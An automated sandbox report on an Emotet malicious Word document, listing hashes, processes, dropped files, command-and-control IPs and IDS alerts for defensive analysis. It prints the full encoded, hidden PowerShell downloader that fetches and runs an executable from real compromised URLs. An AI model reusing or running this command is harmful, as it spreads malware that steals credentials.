analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

JWA_AZW_010120_WZC_011820.doc

Full analysis: https://app.any.run/tasks/7bc91522-8d15-487a-846e-11a144bbfd0b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2020, 09:26:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
opendir
loader
trojan
stealer
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Sequi., Author: Benjamin Paris, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 23:48:00 2020, Last Saved Time/Date: Fri Jan 17 23:48:00 2020, Number of Pages: 2, Number of Words: 4, Number of Characters: 29, Security: 0
MD5:

3284B1EB5FD0D1919899EB2B1BCABEDE

SHA1:

0C0B91B2BDF19533B03F7666E2FFA9864DD8BD27

SHA256:

1683E15AEF94CA2BD323201549FB669A9FB4AD01833CEF15A919A023CF3B27BA

SSDEEP:

6144:yx0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+Kq1cYLOF:yx0E3dxtR/iU9mvUPKO/LOF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • serialfunc.exe (PID: 1152)
      • serialfunc.exe (PID: 1928)
      • 906.exe (PID: 2992)
      • 906.exe (PID: 332)
      • serialfunc.exe (PID: 3752)
      • lHh9sklnJ.exe (PID: 3744)
      • lHh9sklnJ.exe (PID: 3792)
      • serialfunc.exe (PID: 236)
      • serialfunc.exe (PID: 3624)
      • serialfunc.exe (PID: 4080)
    • Emotet process was detected

      • 906.exe (PID: 2992)
      • lHh9sklnJ.exe (PID: 3792)
    • Connects to CnC server

      • serialfunc.exe (PID: 1928)
      • serialfunc.exe (PID: 4080)
    • EMOTET was detected

      • serialfunc.exe (PID: 1928)
      • serialfunc.exe (PID: 4080)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3768)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 1928)
      • serialfunc.exe (PID: 4080)
    • Stealing of credential data

      • serialfunc.exe (PID: 236)
  • SUSPICIOUS

    • Executed via WMI

      • Powershell.exe (PID: 3768)
    • Creates files in the user directory

      • Powershell.exe (PID: 3768)
    • Application launched itself

      • serialfunc.exe (PID: 1152)
      • serialfunc.exe (PID: 1928)
    • PowerShell script executed

      • Powershell.exe (PID: 3768)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3768)
      • 906.exe (PID: 2992)
      • serialfunc.exe (PID: 1928)
      • lHh9sklnJ.exe (PID: 3792)
    • Starts itself from another location

      • 906.exe (PID: 2992)
      • lHh9sklnJ.exe (PID: 3792)
    • Connects to server without host name

      • serialfunc.exe (PID: 1928)
      • serialfunc.exe (PID: 4080)
    • Creates files in the program directory

      • serialfunc.exe (PID: 1928)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2472)
      • serialfunc.exe (PID: 236)
      • serialfunc.exe (PID: 3752)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2472)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Sequi.
Subject: -
Author: Benjamin Paris
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 23:48:00
ModifyDate: 2020:01:17 23:48:00
Pages: 2
Words: 4
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 32
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
12
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winword.exe no specs powershell.exe 906.exe no specs #EMOTET 906.exe serialfunc.exe no specs #EMOTET serialfunc.exe lhh9sklnj.exe no specs serialfunc.exe no specs serialfunc.exe #EMOTET lhh9sklnj.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2472"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\JWA_AZW_010120_WZC_011820.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3768Powershell -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgBmAHoAZgBnAGgAJwA7ACQASgBhAGUAcAB1AHAAbwByAHUAYgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACsAJwAuAGUAeABlACcAOwAkAFAAegBuAGYAbQBqAGMAbwBxAGwAYgBwAGsAPQAnAFkAeAByAHUAcwBsAGwAdwBmAGQAJwA7ACQAVgBvAGQAbABqAHgAcgB6AHEAbQBuAGwAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAEIAQwBsAEkARQBOAFQAOwAkAEEAaQB1AHcAZwB4AGMAbgBnAGoAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGwAdQBlAGQAcgBlAGEAbQAuAGEAbAAvAGMAYQBsAGUAbgBkAGEAcgAvAHIAOAAzAGcAOQAvACoAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAYQBuAGgAYgBpAG4AaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAEQAcQAvACoAaAB0AHQAcAA6AC8ALwBzAGYAbQBhAGMALgBiAGkAegAvAGMAYQBsAGUAbgBkAGEAcgAvAEsAMQBhAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AbQBlAHQAcAByAGkAbgB0AC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AcQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AagBtAGUAYwBoAGEAbgBpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBkAGQAeQAvACcALgAiAFMAYABQAEwASQBUACIAKAAnACoAJwApADsAJABQAG4AZABmAGUAeABsAGkAPQAnAEMAZAB4AHIAZQBsAGUAYQBvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAGUAeQBvAGEAdQB5AGcAZgBjAGcAdQB6ACAAaQBuACAAJABBAGkAdQB3AGcAeABjAG4AZwBqACkAewB0AHIAeQB7ACQAVgBvAGQAbABqAHgAcgB6AHEAbQBuAGwALgAiAEQATwBgAFcATgBMAG8AYQBEAEYAYABpAGwARQAiACgAJABQAGUAeQBvAGEAdQB5AGcAZgBjAGcAdQB6ACwAIAAkAEoAYQBlAHAAdQBwAG8AcgB1AGIAKQA7ACQAVwBiAGgAcABtAGgAbABlAGMAPQAnAFoAaABuAGIAbQBnAHcAcgAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAYQBlAHAAdQBwAG8AcgB1AGIAKQAuACIAbABgAEUATgBnAHQASAAiACAALQBnAGUAIAAzADkAMQA0ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAFQAIgAoACQASgBhAGUAcAB1AHAAbwByAHUAYgApADsAJABQAHYAbgB4AGEAZwBhAHMAZQBwAHgAPQAnAEwAdgBwAHIAcQB6AGQAcQBhAGEAZQBwACcAOwBiAHIAZQBhAGsAOwAkAFkAeQBkAHcAcQB6AGcAbAA9ACcAUABnAGYAZABqAGQAbABiACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFAAcgBxAGYAYQB6AGMAeQBwAHYAagBoAD0AJwBDAHUAYgB0AGgAdwBtAGEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
332"C:\Users\admin\906.exe" C:\Users\admin\906.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
2992--c8768c3dC:\Users\admin\906.exe
906.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1152"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe906.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
1928--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3744"C:\ProgramData\lHh9sklnJ.exe"C:\ProgramData\lHh9sklnJ.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
sample MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3752"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\21F5.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exeserialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
236"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" "C:\Users\admin\AppData\Local\Temp\2205.tmp"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3792--372e7334C:\ProgramData\lHh9sklnJ.exe
lHh9sklnJ.exe
User:
admin
Integrity Level:
MEDIUM
Description:
sample MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Total events
2 481
Read events
1 587
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
3
Text files
0
Unknown types
8

Dropped files

PID
Process
Filename
Type
2472WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA8CD.tmp.cvr
MD5:
SHA256:
2472WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF211F708775D8ECAA.TMP
MD5:
SHA256:
3768Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XF18EM2PCU9W8I182GPH.temp
MD5:
SHA256:
3752serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp
MD5:
SHA256:
3752serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
MD5:
SHA256:
3752serialfunc.exeC:\Users\admin\Documents\Outlook Files\[email protected]
MD5:
SHA256:
236serialfunc.exeC:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
MD5:
SHA256:
236serialfunc.exeC:\Users\admin\Documents\Outlook Files\[email protected]
MD5:
SHA256:
2472WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
3768Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b1c6.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1928
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/n8aW3mlRqvMbx3U
US
binary
587 Kb
malicious
1928
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/Pk7vHXrD
US
binary
148 b
malicious
3768
Powershell.exe
GET
200
185.32.20.6:80
http://www.bluedream.al/calendar/r83g9/
AL
executable
344 Kb
suspicious
4080
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/ZM3jmNLtZHNL1DJ
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1928
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
4080
serialfunc.exe
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
3768
Powershell.exe
185.32.20.6:80
www.bluedream.al
S E L C O M Shpk
AL
suspicious

DNS requests

Domain
IP
Reputation
www.bluedream.al
  • 185.32.20.6
suspicious

Threats

PID
Process
Class
Message
3768
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3768
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3768
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1928
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1928
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1928
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1928
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1928
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1928
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4080
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
No debug info